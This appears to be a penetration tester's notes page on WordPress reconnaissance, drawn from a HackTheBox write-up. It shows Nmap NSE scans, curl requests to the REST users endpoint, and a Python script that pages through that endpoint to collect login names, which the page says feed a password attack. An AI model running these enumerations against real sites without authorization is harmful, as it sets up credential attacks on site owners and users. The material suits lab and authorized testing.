
Manual Enumeration with Nmap

Find WordPress NSE Scripts

find /usr/share/nmap/scripts -name '*wordpress*'

Enumerate WordPress Plugins

grep '@args' /usr/share/nmap/scripts/http-wordpress-enum.nse

Example scan with arguments, where the WordPress installation lives at http://domain.tld/webservices/wp/ (so the script is pointed at that path with root), all plugins are enumerated rather than the default of 100 (search-limit="all"), and the latest version data for each plugin is fetched from api.wordpress.org (check-latest="true"). That last option means the scanning host needs outbound internet access; without it the script still lists plugins but cannot flag outdated ones.

sudo nmap -T4 -Pn -sC --script http-wordpress-enum --script-args http-wordpress-enum.root="/webservices/wp/",http-wordpress-enum.search-limit="all",http-wordpress-enum.check-latest="true" -p80 domain.tld


Enumerate WordPress Users

Nmap

List possible Nmap script arguments

grep '@args' /usr/share/nmap/scripts/http-wordpress-users.nse

Example scan with arguments, where the WordPress installation lives at http://domain.tld/webservices/wp/ (basepath) and author IDs 1 through 100 are checked (limit="100"). The script resolves each numeric author ID to a username, so a small limit is usually enough on a site with few authors.

sudo nmap -T4 -Pn -sC --script http-wordpress-users --script-args http-wordpress-users.basepath="/webservices/wp/",http-wordpress-users.limit="100" -p80 domain.tld

REST API

This script hasn't always worked for me. Another option is to use the REST API to enumerate users. On a default WordPress install the /wp-json/wp/v2/users endpoint is readable without authentication; it is only hidden when a security plugin or custom code blocks it. Note that the URL must be quoted, otherwise the shell treats the & as a background operator and drops everything after it.

# Get the first 100 users from the API
# WordPress caps per_page at 100, so larger result sets must be paginated
curl -s 'http://domain.tld/wp-json/wp/v2/users?per_page=100&page=1'

# Get the next 100 users from the API
# Query page 2 of the results; the X-WP-Total and X-WP-TotalPages response
# headers (visible with curl -i) tell you how many pages to walk
curl -s 'http://domain.tld/wp-json/wp/v2/users?per_page=100&page=2'

# If pretty permalinks are disabled, /wp-json/ may 404; the rest_route query
# parameter reaches the same endpoint
curl -s 'http://domain.tld/?rest_route=/wp/v2/users&per_page=100&page=1'
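Walking the pages by hand gets tedious, so here is the same enumeration as a script. This is an added example, not code from the original write-up: it requests /wp-json/wp/v2/users page by page, stops on the X-WP-TotalPages header, a short page, an empty page, or any non-200 response (a 401/403 means the endpoint is blocked, a 400 means you ran past the last page), and returns the user IDs, slugs (login names) and display names. The host http://domain.tld is the page's placeholder, and the sample responses served by demo_fetch are constructed, not captured from a real site.

```python
"""Enumerate WordPress users through the REST API with pagination.

Added example; assumes the target (placeholder http://domain.tld) exposes
/wp-json/wp/v2/users unauthenticated, as a default install does.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qs, urlparse

# WordPress rejects per_page values above 100 with a 400 error.
MAX_PER_PAGE = 100

Response = Tuple[int, Dict[str, str], bytes]


def http_fetch(url: str) -> Response:
    """GET url and return (status, headers, body); 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read()


def users_url(base: str, page: int, per_page: int, rest_route: bool) -> str:
    """Build the endpoint URL; rest_route=True uses the ?rest_route= form for
    sites whose pretty permalinks are disabled."""
    base = base.rstrip("/")
    if rest_route:
        return f"{base}/?rest_route=/wp/v2/users&per_page={per_page}&page={page}"
    return f"{base}/wp-json/wp/v2/users?per_page={per_page}&page={page}"


def enumerate_users(base: str, fetch: Callable[[str], Response] = http_fetch,
                    per_page: int = MAX_PER_PAGE, rest_route: bool = False) -> List[dict]:
    """Return [{"id", "slug", "name"}, ...] for every user the API will show."""
    per_page = min(per_page, MAX_PER_PAGE)
    users: List[dict] = []
    page = 1
    while True:
        status, headers, body = fetch(users_url(base, page, per_page, rest_route))
        if status != 200:          # blocked (401/403), past last page (400), etc.
            break
        data = json.loads(body)
        if not isinstance(data, list) or not data:   # error object or empty page
            break
        users.extend({"id": u["id"], "slug": u["slug"], "name": u.get("name", "")}
                     for u in data)
        lowered = {k.lower(): v for k, v in headers.items()}
        total_pages = int(lowered.get("x-wp-totalpages", "0") or 0)
        if (total_pages and page >= total_pages) or len(data) < per_page:
            break
        page += 1
    return users


# Constructed sample data standing in for a real target (not captured output).
SAMPLE_PAGES = {
    1: [{"id": 1, "slug": "admin", "name": "Site Admin"},
        {"id": 2, "slug": "author1", "name": "First Author"}],
    2: [{"id": 3, "slug": "editor", "name": "Content Editor"}],
}


def demo_fetch(url: str) -> Response:
    """Offline stand-in for http_fetch: serves SAMPLE_PAGES two users per page."""
    page = int(parse_qs(urlparse(url).query).get("page", ["1"])[0])
    headers = {"X-WP-Total": "3", "X-WP-TotalPages": "2"}
    if page in SAMPLE_PAGES:
        return 200, headers, json.dumps(SAMPLE_PAGES[page]).encode()
    # Constructed error body; the real one is also a JSON object with a "code" key.
    return 400, headers, json.dumps({"code": "invalid_page", "data": {"status": 400}}).encode()


if __name__ == "__main__":
    for user in enumerate_users("http://domain.tld", fetch=demo_fetch, per_page=2):
        print(f'{user["id"]:>4}  {user["slug"]:<16} {user["name"]}')
```

Swap demo_fetch for the default http_fetch to run it against a live target; the slugs are what you feed to a password attack, since WordPress logs users in by login name rather than display name.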

References

Borrowed from my write-up of HackTheBox's TartarSauce: https://benheater.com/hackthebox-tartarsauce/#wordpress-enumeration